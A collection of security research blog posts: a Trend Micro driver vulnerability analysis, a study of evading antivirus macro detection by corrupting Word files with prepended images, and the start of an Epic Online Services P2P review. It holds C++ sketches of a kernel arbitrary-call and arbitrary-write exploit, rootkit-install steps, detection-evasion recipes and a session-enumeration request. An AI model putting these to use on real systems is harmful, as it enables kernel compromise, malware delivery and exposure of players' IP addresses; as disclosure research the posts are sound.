When I was initially reverse engineering the functions in this sub dispatch table, I was quite confused because the code "didn't seem right". It appeared that the MicroScan kernel pointer returned by functions such as GetProcessesAllMethods was being passed directly by the client to other functions such as DeleteTaskResults. These functions would then take this untrusted kernel pointer and, with almost no validation, call functions in the virtual function table specified at the base of the class.


Taking a look at the "validation routine" for the DeleteTaskResults sub dispatch table entry, the only validation performed on the MicroScan instance specified at the input buffer + 0x10 was making sure it was a valid kernel address.


The only other check besides making sure that the supplied pointer was in kernel memory was a simple check in DeleteTaskResults to make sure the Tag member of the MicroScan is PANS.


Since DeleteTaskResults calls the constructor specified in the virtual function table of the MicroScan instance, to call an arbitrary kernel function we need to:

  1. Be able to allocate at least 10 bytes of kernel memory (for vtable and tag).
  2. Control the allocated kernel memory to set the virtual function table pointer and the tag.
  3. Be able to determine the address of this kernel memory from user-mode.

Fortunately, a mentor of mine, Alex Ionescu, was able to point me in the right direction when it comes to allocating and controlling kernel memory from user-mode. A HackInTheBox Magazine from 2010 had an article by Mateusz Jurczyk called "Reserve Objects in Windows 7". This article discussed using APC Reserve Objects, which were introduced in Windows 7, to allocate controllable kernel memory from user-mode. The general idea is that you can queue an Apc to an Apc Reserve Object with the ApcRoutine and ApcArgumentX members being the data you want in kernel memory and then use NtQuerySystemInformation to find the Apc Reserve Object in kernel memory. This reserve object will have the previously specified KAPC variables in a row, allowing a user-mode application to control up to 32 bytes of kernel memory (on 64-bit) and know the location of that memory. I would strongly suggest reading the article if you'd like to learn more.
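
Here is a condensed sketch of the trick as I understand it (heavily hedged: the prototypes below are undocumented and taken from public research, and the handle-table leak used to locate the reserve object's KAPC is omitted):

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS(NTAPI* NtAllocateReserveObject_t)(
    PHANDLE ReserveHandle, POBJECT_ATTRIBUTES ObjectAttributes, ULONG Type);
typedef NTSTATUS(NTAPI* NtQueueApcThreadEx_t)(
    HANDLE ThreadHandle, HANDLE ReserveHandle, PVOID ApcRoutine,
    PVOID Argument1, PVOID Argument2, PVOID Argument3);

void BuildFakeMicroScan(PVOID kernelFunctionToCall) {
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    auto NtAllocateReserveObject = (NtAllocateReserveObject_t)
        GetProcAddress(ntdll, "NtAllocateReserveObject");
    auto NtQueueApcThreadEx = (NtQueueApcThreadEx_t)
        GetProcAddress(ntdll, "NtQueueApcThreadEx");

    HANDLE reserve = nullptr;
    NtAllocateReserveObject(&reserve, nullptr, 0 /* UserApcReserve */);

    // Leak the reserve object's kernel address from the handle table via
    // NtQuerySystemInformation (omitted) and compute where the embedded
    // KAPC's routine/argument fields live.
    ULONG_PTR apcFields = /* leaked KAPC field base */ 0;

    // The queued-but-unfired KAPC keeps these pointer-sized fields contiguous
    // in kernel memory, which we lay out as a fake MicroScan:
    //   +0x00 vtable pointer -> points at the +0x10 slot below
    //   +0x08 Tag            -> 'PANS'
    //   +0x10 vtable.Constructor -> the kernel pointer we want called
    NtQueueApcThreadEx(GetCurrentThread(), reserve,
                       (PVOID)(apcFields + 0x10),
                       (PVOID)(ULONG_PTR)'PANS',
                       kernelFunctionToCall, nullptr);

    // apcFields can now be handed to DeleteTaskResults as the "MicroScan".
}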

This trick still works in Windows 10, meaning we're able to meet all three requirements. By using an Apc Reserve Object, we can allocate at least 10 bytes for the MicroScan structure and bypass the inadequate checks completely. The result? The ability to call arbitrary kernel pointers.


Although I provided a specific example of vulnerable code in DeleteTaskResults, any of the functions I marked in the table with asterisks are vulnerable. They all trust the kernel pointer specified by the untrusted client and end up calling a function in the MicroScan instance's virtual function table.

IoControlCode == 90004033h

Discovery

This next sub dispatch table primarily manages the TrueApi class we reviewed before.

OperationCode | PrimaryRoutine                  | Description
EA60h         | IoControlGetTrueAPIPointer      | Retrieve pointers to functions in the TrueApi class.
EA61h         | IoControlGetUtilityAPIPointer   | Retrieve pointers to utility functions of the driver.
EA62h         | IoControlRegisterUnloadNotify*  | Register a function to be called on unload.
EA63h         | IoControlUnRegisterUnloadNotify | Unregister a previously registered unload function.

Exploitation

IoControlRegisterUnloadNotify

This function caught my eye the moment I saw its name in a debug string. Using this sub dispatch table function, an untrusted client can register up to 16 arbitrary "unload routines" that get called when the driver unloads. This function's validator routine checks this pointer from the untrusted client buffer for validity. If the caller is from user-mode, the validator calls ProbeForRead on the untrusted pointer. If the caller is from kernel-mode, the validator checks that it is a valid kernel memory address.

This function cannot immediately be used in an exploit from user-mode. The problem is that if we're a user-mode caller, we must provide a user-mode pointer, because the validator routine uses ProbeForRead. When the driver unloads, this user-mode pointer gets called, but it won't do much because of mitigations such as SMEP. I'll reference this function in a later section, but it is genuinely scary to see an untrusted user-mode client being able to direct a driver to call an arbitrary pointer by design.

IoControlCode == 900040DFh

This sub dispatch table is used to interact with the XrayApi. Although the Xray Api is generally used by scans implemented in the kernel, this sub dispatch table provides limited access for the client to interact with physical drives.

OperationCode | PrimaryRoutine          | Description
15F90h        | IoControlReadFile       | Read a file directly from a disk.
15F91h        | IoControlUpdateCoreList | Update the kernel pointers used by the Xray Api.
15F92h        | IoControlGetDRxMapTable | Get a table of drives mapped to their corresponding devices.

IoControlCode == 900040E7h

Discovery

The final sub dispatch table is used to scan for hooks in a variety of system structures. It was interesting to see the variety of hooks Trend Micro checks for, including hooks in object types, major function tables, and even inline function hooks.

OperationCode | PrimaryRoutine                 | Description
186A0h        | TMXMSCheckSystemRoutine        | Check a few system routines for hooks.
186A1h        | TMXMSCheckSystemFileIO         | Check file IO major functions for hooks.
186A2h        | TMXMSCheckSpecialSystemHooking | Check the file object type and ntoskrnl Io functions for hooks.
186A3h        | TMXMSCheckGeneralSystemHooking | Check the Io manager for hooks.
186A4h        | TMXMSCheckSystemObjectByName   | Recursively trace a system object (either a directory or symlink).
186A5h        | TMXMSCheckSystemObjectByName2* | Copy a system object into user-mode memory.

Exploitation

Yeah, TMXMSCheckSystemObjectByName2 is as bad as it sounds. Before looking at the function directly, here are a few reverse-engineered structures used later:

struct CheckSystemObjectParams
{
    PVOID Src;
    PVOID Dst;
    DWORD Size;
    DWORD* OutSize;
};

struct TXMSParams
{
    DWORD OutStatus;
    DWORD HandlerID;
    CHAR unk[0x38];
    CheckSystemObjectParams* CheckParams;
};

TMXMSCheckSystemObjectByName2 takes in a Source pointer, Destination pointer, and a Size in bytes. The validator function called for TMXMSCheckSystemObjectByName2 checks the following:

  • ProbeForRead on the CheckParams member of the TXMSParams structure.
  • ProbeForRead and ProbeForWrite on the Dst member of the CheckSystemObjectParams structure.

Essentially, this means that we need to pass a valid CheckParams structure and that the Dst pointer we pass must be in user-mode memory. Now let's look at the function itself.


Although that for loop may seem scary, all it is doing is an optimized check of a range of kernel memory: for every memory page in the range Src to Src + Size, the function calls MmIsAddressValid. The real scary part is the memmove operations that follow.


These operations take an untrusted Src pointer and copy Size bytes to the untrusted Dst pointer... yikes. We can use the memmove operations to read an arbitrary kernel pointer, but what about writing to an arbitrary kernel pointer? The problem is that the validator for TMXMSCheckSystemObjectByName2 requires that the destination is user-mode memory. Fortunately, there is another bug in the code.

The next line, *params->OutSize = Size;, takes the Size member from our structure and places it at the pointer specified by the untrusted OutSize member. No verification is done on what OutSize points to; thus we can write up to a DWORD per IOCTL call. One caveat is that the Src pointer needs to point to valid kernel memory for up to Size bytes. To meet this requirement, I just passed the base of the ntoskrnl module as the source.
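
Putting it together, the write primitive looks roughly like this (a sketch using the structures reversed above and an already-opened device handle; how exactly the operation code travels inside TXMSParams is my assumption):

#include <windows.h>

// Assumes the CheckSystemObjectParams/TXMSParams definitions from above.
void WriteDword(HANDLE device, PVOID kernelAddress, DWORD value, PVOID ntoskrnlBase) {
    // The driver memmoves 'value' bytes from Src to Dst before the OutSize
    // write, so the user-mode destination must be large enough and Src
    // (ntoskrnl's base) must stay readable for that many bytes -- this
    // bounds the values writable in one call.
    PVOID scratch = VirtualAlloc(nullptr, value, MEM_COMMIT | MEM_RESERVE,
                                 PAGE_READWRITE);

    CheckSystemObjectParams params = {};
    params.Src     = ntoskrnlBase;            // readable kernel range
    params.Dst     = scratch;                 // validator demands user-mode memory
    params.Size    = value;                   // the DWORD we want written...
    params.OutSize = (DWORD*)kernelAddress;   // ...lands at this unchecked pointer

    TXMSParams request = {};
    request.HandlerID   = 0x186A5;            // TMXMSCheckSystemObjectByName2 (assumed field)
    request.CheckParams = &params;

    DWORD bytesReturned = 0;
    DeviceIoControl(device, 0x900040E7, &request, sizeof(request),
                    &request, sizeof(request), &bytesReturned, nullptr);
    VirtualFree(scratch, 0, MEM_RELEASE);
}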

Using this arbitrary write primitive, we can use the previously found unload routines trick to execute code. Although the validator routine prevents us from passing in a kernel pointer if we're calling from user-mode, we don't actually need to go through the validator. Instead, we can write to the unload routine array inside of the driver's .data section using our write primitive and place the pointer we want.

Really, really bad code

Typically, I like sticking to strictly security in my blog posts, but this driver made me break that tradition. In this section, we won't be covering the security issues of the driver, rather the terrible code that's used by millions of Trend Micro customers around the world.

Bruteforcing Processes


Let's take a look at what's happening here. This function has a for loop from 0 to 0x10000, incrementing by 4, that retrieves the process object behind the current index (if there is one). If the index does match a process, the function checks if the name of the process is csrss.exe. If the process is named csrss.exe, the final check is that the session ID of the process is 0. Come on guys, there is literally a documented API to enumerate processes from the kernel... what's the point of bruteforcing?
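
A rough reconstruction of the decompiled loop (illustrative, not Trend Micro's actual code; PsGetProcessImageFileName is an undocumented kernel export declared by hand here):

#include <ntifs.h>

extern "C" UCHAR* PsGetProcessImageFileName(PEPROCESS Process);

PEPROCESS FindSessionZeroCsrss() {
    for (ULONG_PTR pid = 0; pid < 0x10000; pid += 4) {
        PEPROCESS process = NULL;
        if (!NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)pid, &process)))
            continue; // not a valid process ID, try the next one
        if (strcmp((const char*)PsGetProcessImageFileName(process), "csrss.exe") == 0 &&
            PsGetProcessSessionId(process) == 0)
            return process; // caller owns the reference
        ObDereferenceObject(process);
    }
    return NULL;
}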

Bruteforcing Offsets

EPROCESS ImageFileName Offset


When I first saw this code, I wasn't sure what I was looking at. The function takes the current process, which happens to be the System process since this is called in a System thread, then it searches for the string "System" in the first 0x1000 bytes. What's happening is... Trend Micro is bruteforcing the ImageFileName member of the EPROCESS structure by looking for the known name of the System process inside of its EPROCESS structure. If you wanted the ImageFileName of a process, just use ZwQueryInformationProcess with the ProcessImageFileName class...

EPROCESS Peb Offset


In this function, Trend Micro uses the PID of the csrss process to brute force the Peb member of the EPROCESS structure. The function retrieves the EPROCESS object of the csrss process by using PsLookupProcessByProcessId and retrieves the PebBaseAddress by using ZwQueryInformationProcess. Using those pointers, it tries every offset from 0 to 0x2000, looking for one that matches the known Peb pointer. What's the point of finding the offset of the Peb member when you can just use ZwQueryInformationProcess, as you already do...

ETHREAD StartAddress Offset


Here Trend Micro uses the current system thread with a known start address to brute force the StartAddress member of the ETHREAD structure. Another case where finding the raw offset is unnecessary. There is a semi-documented class of ZwQueryInformationThread called ThreadQuerySetWin32StartAddress which gives you the start address of a thread.

Unoptimized Garbage


When I initially decompiled this function, I thought IDA Pro might be simplifying a memset operation, because all this function was doing was setting all of the TrueApi structure members to zero. I decided to take a peek at the assembly to confirm I wasn't missing something...


Yikes... looks like someone turned off optimizations.

Cheating Microsoft's WHQL Certification

So far we've covered methods to read and write arbitrary kernel memory, but there is one step missing to install our own rootkit. Although you could execute kernel shellcode with just a read/write primitive, I generally like finding the path of least resistance. Since this is a third-party driver, chances are, there is some NonPagedPool memory allocated which we can use to host and execute our malicious shellcode.

Let's take a look at how Trend Micro allocates memory. Early in the entrypoint of the driver, Trend Micro checks if the machine is a "supported system" by checking the major version, minor version, and the build number of the operating system. Trend Micro does this because they hardcode several offsets which can change between builds.

Fortunately, the PoolType global variable which is used to allocate non-paged memory is set to 0 (NonPagedPool) by default. I noticed that although this value was 0 initially, the variable was still in the .data section, meaning it could be changed. When I looked at what wrote to the variable, I saw that the same function responsible for checking the operating system's version also set this PoolType variable in certain cases.


From a brief glance, it looked like if our operating system is Windows 10 or a newer version, the driver prefers to use NonPagedPoolNx. Good from a security standpoint, but bad for us. This pool type is used for all non-paged allocations, meaning we would have to find a spare ExAllocatePoolWithTag with a hardcoded NonPagedPool argument, otherwise we couldn't use the driver's allocated memory on Windows 10. But it's not that straightforward. What about MysteriousCheck(), the second requirement of this if statement?


What MysteriousCheck() was doing was checking whether Microsoft's Driver Verifier was enabled... Instead of just using NonPagedPoolNx on Windows 8 or higher, Trend Micro placed an explicit check to only use secure memory allocations if they're being watched. Why is this not just an example of bad code? Because Trend Micro's driver is WHQL certified.


Passing Driver Verifier has been a long-time requirement of obtaining WHQL certification. On Windows 10, Driver Verifier enforces that drivers do not allocate executable memory. Instead of complying with this requirement designed to secure Windows users, Trend Micro decided to ignore their user's security and designed their driver to cheat any testing or debugging environment which would catch such violations.

Honestly, I'm dumbfounded. I don't understand why Trend Micro would go out of their way to cheat in these tests. Trend Micro could have just left the Windows 10 check, why would you even bother creating an explicit check for Driver Verifier? The only working theory I have is that for some reason most of their driver is not compatible with NonPagedPoolNx and that only their entrypoint is compatible, otherwise there really isn't a point.

Delivering on my promise

As I promised, you can use Trend Micro's driver to install your own rootkit. Here is what you need to do:

  1. Find any NonPagedPool allocation by the driver. As long as you don't have Driver Verifier running, you can use any of the non-paged allocations that have their pointers stored in the .data section. Preferably, pick an allocation that isn't used often.
  2. Write your kernel shellcode anywhere in the memory allocation using the arbitrary kernel write primitive in TMXMSCheckSystemObjectByName2.
  3. Execute your shellcode by registering an unload routine (directly in .data) or using the several other execution methods present in the 90004027h dispatch table.

It's really as simple as that.

Conclusion

I reverse a lot of drivers and you do typically see some pretty dumb stuff, but I was shocked to see many of the findings in this article coming from a company such as Trend Micro. Most of the driver feels like proof-of-concept garbage that is held together by duct tape.

Although Trend Micro has taken basic precautionary measures such as restricting who can talk to their driver, a significant amount of the code inside of the IOCTL handlers includes very risky DKOM. Also, I'm not sure how certain practices, such as bruteforcing anything, would get through an adequate code review process. For example, the Bruteforcing Processes code doesn't make sense; are Trend Micro developers not aware of enumerating processes via ZwQuerySystemInformation? What about disabling optimizations? Anti-virus already gets flak for slowing down client machines, why would you intentionally make your driver slower? To add insult to injury, this driver is used in several Trend Micro products, not just their rootkit remover. All I know going forward is that I won't be a Trend Micro customer anytime soon.

Defeating Macro Document Static Analysis with Pictures of My Cat

16 September 2020 at 11:33

Over the past few weeks I've spent some time learning Visual Basic for Applications (VBA), specifically for creating malicious Word documents to act as an initial stager. When taking operational security into consideration and brainstorming ways of evading macro detection, I had the question, how does anti-virus detect a malicious macro?

The hypothesis I came up with was that anti-virus would parse the macro content out of the Word document and scan the macro code for a variety of malicious techniques, nothing crazy. A common way I've seen attackers counter this sort of detection is macro obfuscation, which is effectively scrambling macro content in an attempt to evade the malicious patterns anti-virus looks for.

The questions I wanted answered were:

  1. How does anti-virus even retrieve the macro content?
  2. What differences are there between how Microsoft Word and anti-virus products retrieve macro content?

Discovery

According to Wikipedia, Office Open XML (OOXML) "is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents". This is the file format used for the common Microsoft Word extensions docx and docm. The fact that Microsoft Office documents were essentially a zip file of XML files certainly piqued my interest.

Since the OOXML format is just a zip file, I found that parsing macro content from a Microsoft Word document was simpler than you might expect. All an anti-virus would need to do is the following (sketched in code after the list):

  1. Extract the Microsoft Office document as a ZIP and look for the file word\vbaProject.bin.
  2. Parse the OLE binary and extract the macro content.
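
Here's what step 1 can look like with the open-source miniz library (my illustration of the approach, not any particular engine's code):

#include <cstdio>
#include "miniz.h"

// Returns a heap buffer holding the OLE binary with the macro streams.
void* ExtractVbaProject(const char* docmPath, size_t* size) {
    mz_zip_archive zip = {};
    if (!mz_zip_reader_init_file(&zip, docmPath, 0))
        return nullptr; // a strict parser gives up here on a corrupted archive
    void* data = mz_zip_reader_extract_file_to_heap(&zip, "word/vbaProject.bin",
                                                    size, 0);
    mz_zip_reader_end(&zip);
    return data;
}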

The difference I was interested in was how each implementation would handle errors and corruption. For example, common implementations of ZIP extraction will often have error checking such as:

  1. Does the local file header begin with the signature 0x04034b50?
  2. Is the minimum version bytes greater than what is supported?

What I was really after was finding ways to break the ZIP parser in anti-virus without breaking the ZIP parser used by Microsoft Office.

Before we get into corrupting anything, we need a base sample first. As an example, I simply wrote a basic macro that would display "Hello World!" when the document was opened.


For the purposes of testing detection of macros, I needed another sample document that was heavily detected by anti-virus. After a quick Google search, I found a few samples shared by @malware_traffic here. The sample named HSOTN2JI.docm had the highest detection rate, coming in at 44/61 engines marking the document as malicious.


To ensure that detections were specifically based on the malicious macro inside the document's vbaProject.bin OLE file, I...

  1. Opened both my "Hello World" and the HSOTN2JI macro documents as ZIP files.
  2. Replaced the vbaProject.bin OLE file in my "Hello World" macro document with the vbaProject.bin from the malicious HSOTN2JI macro document.

Running the scan again resulted in a similarly high detection rate.


Fortunately, these anti-virus products were detecting the actual macro and not solely relying on conventional methods such as blacklisting the hash of the document. Now with a base malicious sample, we can begin tampering with the document.

Exploitation

The methodology I used for each corruption method was:

  1. Modify the original base sample file with the corruption method.
  2. Verify that the document still opens in Microsoft Word.
  3. Upload the new document to VirusTotal.
  4. If the results were good, retry the method on my original "Hello World" macro document and verify that the macro still works.

Before continuing, it's important to note that the methods discussed in this blog post do come with drawbacks, specifically:

  1. Whenever a victim opens a corrupted document, they will receive a prompt asking whether or not they'd like to recover the document.
  2. Before the macro is executed, the victim will be prompted to save the recovered document. Once the victim has saved the recovered document, the macro will execute.

Although adding any user interaction certainly increases the complexity of the attack, if a victim was going to enable macros anyway, they'd probably also be willing to recover the document.

General Corruption

We'll first start with the effects of general corruption on a Microsoft Word document. What I mean by this is I'll be corrupting the file using methods that are non-specific to the ZIP file format.

First, let's observe the impact of adding random bytes to the beginning of the file.


With a few bytes at the beginning of the document, we were able to decrease detection by about 33%. This made me confident that future attempts could reduce this even further.

Result: 33% decrease in detection

Prepending My Cat

This time, let's do the same thing except prepend a JPG file, in this case, a photo of my cat!


You might think that prepending some random data should result in the same detection rate as an image, but some anti-virus engines marked the file as clean as soon as they saw an image.


To aid in future research, the anti-virus engines that marked the random data document as malicious but did not mark the cat document as malicious were:

Ad-Aware
ALYac
DrWeb
eScan
McAfee
Microsoft
Panda
Qihoo-360
Sophos ML
Tencent
VBA32

The reason this list is larger than the actual difference in detection is because some engines strangely detected this cat document, but did not detect the random data document.

Result: 50% decrease in detection

Prepending + Appending My Cat

Purely appending data to the end of a macro document barely impacts the detection rate. Instead, we'll combine appending data with other methods, starting with my cat.


What was shocking about all of this was that even when the ZIP file was sandwiched between two images, Microsoft's parser was able to reliably recover the document and macro! With only extremely basic modifications to the document, we were able to essentially prevent most detection of the macro.

Result: 88% decrease in detection

Zip Corruption

Microsoft's fantastic document recovery is not just exclusive to general methods of file corruption. Let's take a look at how it handles corruption specific to the ZIP file format.

Corrupting the ZIP Local File Header

The only file we care about preventing access to is the vbaProject.bin file, which contains the malicious macro. Without corrupting the data, could we corrupt the file header for the vbaProject.bin file and still have Microsoft Word recognize the macro document?

Let's take a look at the structure of a local file header from Wikipedia:

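In C terms, the fixed portion of that header looks like this (field names are mine; layout per the ZIP APPNOTE specification):

#include <cstdint>

#pragma pack(push, 1)
struct ZipLocalFileHeader {
    uint32_t signature;        // 0x04034b50, the bytes "PK\x03\x04"
    uint16_t versionNeeded;    // minimum version needed to extract
    uint16_t flags;            // general purpose bit flag
    uint16_t compressionMethod;
    uint16_t lastModTime;      // DOS format
    uint16_t lastModDate;      // DOS format
    uint32_t crc32;
    uint32_t compressedSize;
    uint32_t uncompressedSize;
    uint16_t fileNameLength;   // file name follows the fixed header
    uint16_t extraFieldLength; // extra field follows the file name
};
#pragma pack(pop)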

I decided that the local file header signature would be the least likely to break file parsing, hoping that Microsoft Word didn't care whether or not the file header had the correct magic value. If Microsoft Word ignored the magic, corrupting it had a high chance of breaking ZIP parsers that do verify it.
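
The corruption itself is a tiny patch, roughly like this (a sketch built on the struct above; my own illustration, not the script mentioned later):

#include <cstring>
#include <vector>

// Find the local file header that precedes word/vbaProject.bin and stomp
// only its four signature bytes.
void CorruptVbaProjectHeader(std::vector<uint8_t>& doc) {
    const char name[] = "word/vbaProject.bin";
    const uint8_t magic[4] = { 0x50, 0x4b, 0x03, 0x04 }; // "PK\x03\x04"
    for (size_t i = 0; i + sizeof(ZipLocalFileHeader) + sizeof(name) < doc.size(); i++) {
        if (memcmp(&doc[i], magic, sizeof(magic)) != 0)
            continue;
        // The file name begins right after the 30-byte fixed header.
        if (memcmp(&doc[i + sizeof(ZipLocalFileHeader)], name, sizeof(name) - 1) == 0) {
            memset(&doc[i], 0, sizeof(magic)); // corrupt only the signature
            return;
        }
    }
}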

After corrupting only the file header signature of the vbaProject.bin file entry, detection dropped yet again.


With a ZIP specific corruption method, we almost completely eliminated detection.

Result: 90% decrease in detection

Combining Methods

With all of these methods, we've been able to reduce static detection of malicious macro documents quite a bit, but it's still not 100%. Could these methods be combined to achieve even lower rates of detection? Fortunately, yes!

Method                                                    | Detection Rate Decrease
Prepending Random Bytes                                   | 33%
Prepending an Image                                       | 50%
Prepending and Appending an Image                         | 88%
Corrupting ZIP File Header                                | 90%
Prepending/Appending Image and Corrupting ZIP File Header | 100%

Interested in trying out the last corruption method, which reduced detection by 100%? I made a script to do just that! To use it, simply execute the script, providing the document filename as the first argument and a picture filename as the second. The script will spit out the patched document to your current directory.

As stated before, even though these methods can bring the detection of a macro document down to 0%, they come at a high cost in attack complexity. A victim will not only need to click to recover the document, but will also need to save the recovered document before the malicious macro executes. Whether or not that added complexity is worth it for your team will largely depend on the environment you're up against.

Regardless, one must heavily applaud the team working on Microsoft Office, especially those who designed the fantastic document recovery functionality. Even when compared to tools that are specifically designed to recover ZIP files, the recovery capability in Microsoft Office exceeds all expectations.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

17 December 2020 at 16:07

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

As someone who enjoys games that involve logistics, a recently-released game caught my eye. That game was Satisfactory, which is all about building up a massive factory on an alien planet from nothing. Since I loved my time with Factorio, another logistics-oriented game, Satisfactory seemed like a perfect fit!

Satisfactory had a unique feature that I rarely see in games today: peer-to-peer multiplayer sessions! Generally speaking, most games take the client-server approach of having dedicated servers serve multiple clients, instead of the peer-to-peer model where clients serve each other.

I was curious to see how it worked under the hood. As a security researcher, one of my number one priorities is to always "stay curious" with anything I interact with. This was a perfect opportunity to exercise that curiosity!

Introduction

When analyzing the communication of any application, a great place to start is attempting to intercept the HTTP traffic. Oftentimes applications won't use an overly complicated protocol if they don't need to, and web requests happen to be one of the most common ways of communicating. To intercept both plaintext and encrypted traffic, I used Fiddler by Telerik, which features a simple-to-use interface for intercepting HTTP(S) traffic. Fiddler took care of automatically installing the root certificate it would use to issue certificates for websites, but the question was whether Satisfactory used a platform with certificate pinning. Only one way to find out!


Lucky for us, the game did not have any certificate pinning mechanism. The first two requests appeared to query the latest game news from Coffee Stain Games, the creators of Satisfactory. I was sad to see that these requests were performed over HTTP, but fortunately did not contain sensitive information.

Taking a look at the other requests revealed that Satisfactory was authenticating with Epic Games. Perhaps they were using an Epic Games service for their multiplayer platform?


In the first request to Epic Games' API servers, there are a few interesting headers that indicate what service this could be connected to. Specifically, the User-Agent and Miscellaneous headers referred to something called "EOS". A quick Google search revealed that this stood for Epic Online Services!

Discovery

Epic Online Services is intended to assist game developers in creating multiplayer-compatible games by offering a platform that supports many common multiplayer features. Whether it be matchmaking, lobbies, or peer-to-peer functionality, there are many attractive features the service offers to game developers.

Before we continue with any security review, it's important to have a basic conceptual understanding of the product you're reviewing. This context can be especially helpful in later stages when trying to understand the inner workings of the product.

First, let's take a look at how you authenticate with the Epic Online Services API (EOS-API). According to documentation, the EOS Client uses OAuth Client Credentials to authenticate with the EOS-API. Assuming you have already set up a project in the EOS Developer Portal, you can generate credentials for either the GameServer or GameClient role, which are expected to be hardcoded into the server/client binary:

The EOS SDK requires a program to provide valid Client Credentials, including a Client ID and Client Secret. This information is passed in the EOS_Platform_ClientCredentials structure, which is a parameter in the function EOS_Platform_Create. This enables the SDK to recognize the program as a valid EOS Client, authorize the Client with EOS, and grant access to the features enabled in the corresponding Client Role.

I found it peculiar that the only "client roles" that existed were GameServer and GameClient. The GameClient role "can access EOS information, but typically can't modify it", whereas the GameServer role "is a server or secure backend intended for administrative purposes". If you're writing a peer-to-peer game, what role do you give clients?

GameClient credentials won't work for hosting sessions, given that they're meant for read-only access, but GameServer credentials are only meant for "a server or secure backend". A peer-to-peer client is neither a server nor anything I'd call "secure", but Epic Games effectively forces developers to embed GameServer credentials, because otherwise how can peer-to-peer clients host sessions?

The real danger here is that the documentation falsely assumes that if a client has the GameServer role, it should be trusted, when in fact the client may be an untrusted P2P client. I was amused by the fact that Epic Games even gives an example of the problem with giving untrusted clients the GameServer role:

The Client is a server or secure backend intended for administrative purposes. This type of Client can directly modify information on the EOS backend. For example, an EOS Client with a role of GameServer could unlock Achievements for a player.

Going back to those requests we intercepted earlier, the client credentials are pretty easy to extract.


In that authentication request, the client credentials are simply embedded as a Base64-encoded string in the Authorization header. Decoding this string provides a username:password combination, which represents the client credentials. With such little effort, we are able to obtain credentials for the GameServer role, giving significant access to the backend used for Satisfactory. We'll take a look at what we can do with GameServer credentials in a later section.
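
For illustration, the header takes this shape (the values here are made up):

Authorization: Basic eHl6X2NsaWVudF9pZDp4eXpfY2xpZW50X3NlY3JldA==

Base64-decoded: xyz_client_id:xyz_client_secret  (Client ID : Client Secret)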

Since we're interested in peer-to-peer sessions/matchmaking, the next place to look is the "Sessions interface", which "gives players the ability to host, find, and interact with online gaming sessions". This Sessions interface can be obtained through the Platform interface function EOS_Platform_GetSessionsInterface. The high-value targets here are session creation, session discovery, and joining a session; problems in these processes could have significant security impact.

Discovery: Session Creation

The first process to look at is session creation. Creating a session with the Sessions interface is relatively simple.

First, you create an EOS_Sessions_CreateSessionModificationOptions structure containing the basic required information about the session.

Finally, you pass this structure to the EOS_Sessions_CreateSessionModification function to create the session. Although this function will end up creating your session, there is a significant amount you can configure about a session, given that the initial structure contains only the information required to create a barebones session.

Discovery: Finding Sessions

For example, let's talk about how matchmaking works with these sessions. A major component of Sessions is the ability to add "custom attributes":

Sessions can contain user-defined data, called attributes. Each attribute has a name, which acts as a string key, a value, an enumerated variable identifying the value's type, and a visibility setting.

These "attributes" are what allows developers to add custom information about a session, such as the map the session is for or what version the host is running at.

EOS makes session searching simple. Similar to session creation, to create a barebone "session search", you simply call EOS_Sessions_CreateSessionSearch with a EOS_Sessions_CreateSessionSearchOptions structure. This structure has the minimum amount of information needed to perform a search, containing only the maximum number of search results to return.

Before performing a search, you can update the session search object to filter for specific properties. EOS allows you to search for sessions based on:

  • A known unique session identifier (at least 16 characters in length).
  • A known unique user identifier.
  • Session Attributes.

Although you can use a session identifier or a user identifier if you're joining a known specific session, for matchmaking purposes, attributes are the only way to "discover" sessions based on user-defined data.

Discovery: Sensitive Information Disclosure

Satisfactory isn't a matchmaking game, and you'd assume they'd use the unique session identifier provided by the EOS-API. Unfortunately, until a month ago, EOS did not allow you to set a custom session identifier. Instead, they forced game developers to use their randomly generated 32-character session ID.

When hosting a session in Satisfactory, hosts are given the option to set a custom session identifier. When joining a multiplayer session, besides joining via a friend, Satisfactory gives the option of using this session identifier to join sessions. How does this work in the background?

Although the EOS-API assigns a random session identifier to every newly created session, many implementations ignore it and choose to use attributes to store a session identifier. Let's be honest, who wants to share a random 32-character string with friends?

I decided the best way to figure out how Satisfactory handled unique session identifiers was to see what happens on the network when I attempt to join a custom session ID.


Here is the request performed when I attempted to join a session with the identifier "test123":

POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  "criteria": [
    {
      "key": "attributes.NUMPUBLICCONNECTIONS_l",
      "op": "GREATER_THAN_OR_EQUAL",
      "value": 1
    },
    {
      "key": "bucket",
      "op": "EQUAL",
      "value": "Satisfactory_1.0.0"
    },
    {
      "key": "attributes.FOSS=SES_CSS_SESSIONID_s",
      "op": "EQUAL",
      "value": "test123"
    }
  ],
  "maxResults": 2
}

Of course, this returned no valid sessions, but the request interestingly revealed that the mechanism used for finding sessions was based on a set of criteria. I was curious: how much flexibility did the EOS-API give the client when it comes to these criteria?

Exploitation: Sensitive Information Disclosure

The first idea I had when I saw that filtering was based on an array of "criteria" was what happens when you specify no criteria? To my surprise, the EOS-API was quite accommodating:
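
A filter request along these lines (the exact body is paraphrased; the maxResults value here is arbitrary) dumps public sessions wholesale:

POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  "criteria": [],
  "maxResults": 200
}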


Although sessions in Satisfactory are advertised to be "Friends-Only", I was able to enumerate all sessions that weren't set to "Private". Along with each session, I am given the IP Address for the host and their user identifier. On a large-scale basis, an attacker could easily use this information to create a map of most players.

To be clear, this isn't just a Satisfactory issue. You can enumerate the sessions of any game you have at least GameClient credentials for. Obviously, in a peer-to-peer model, other players have the potential to learn your IP Address, but the problem here is that it is very simple to enumerate the thousands of active sessions, given that, besides the initial authentication, there are literally no access controls (not even rate-limiting). Furthermore, to connect to another client through the EOS-API, you don't even need the IP Address of the host!

Discovery: Session Hijacking

Going back to what we're really interested in, the peer-to-peer functionality of EOS, I was curious to learn what connecting to other clients actually looks like and what problems might exist with its design. Reading the "Sending and Receiving Data Through P2P Connections" section of the NAT P2P Interface documentation reveals that to connect to another player, we need their:

  1. Product user ID - This "identifies player data for an EOS user within the scope of a single product".
